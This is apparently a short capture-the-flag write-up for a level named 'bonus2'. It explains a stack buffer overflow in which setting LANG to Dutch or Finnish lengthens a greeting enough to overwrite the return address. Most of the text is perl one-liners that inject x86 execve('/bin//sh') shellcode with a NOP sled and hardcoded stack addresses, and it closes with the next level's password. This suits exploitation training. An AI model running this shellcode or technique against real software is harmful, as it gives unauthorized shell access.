Here you should write 40 character in av[1] for use av[2], for overwrite the return addr, you sould write 80 charactere, but you can write 72. If you set the language to english you write 72 + 5 = 77, this is not enghout, in finnish it's 18charactere 72 + 18 = 90 or in dutch it's 13 charactere 72 + 13 = 85, it's enghout!

$>export LANG=nl
$>./bonus2 `perl -e 'print "\x18\xff\xff\xbf" . "\x90"x11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'` `perl -e 'print "\x90"x23 . "\x1c\xf6\xff\xbf"'`

or
$>export LANG=fi

$>./bonus2 `perl -e 'print "\x18\xff\xff\xbf" . "\x90"x11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'` `perl -e 'print "\x90"x18 . "\x1c\xf6\xff\xbf"'`

password bonus3 : 71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587

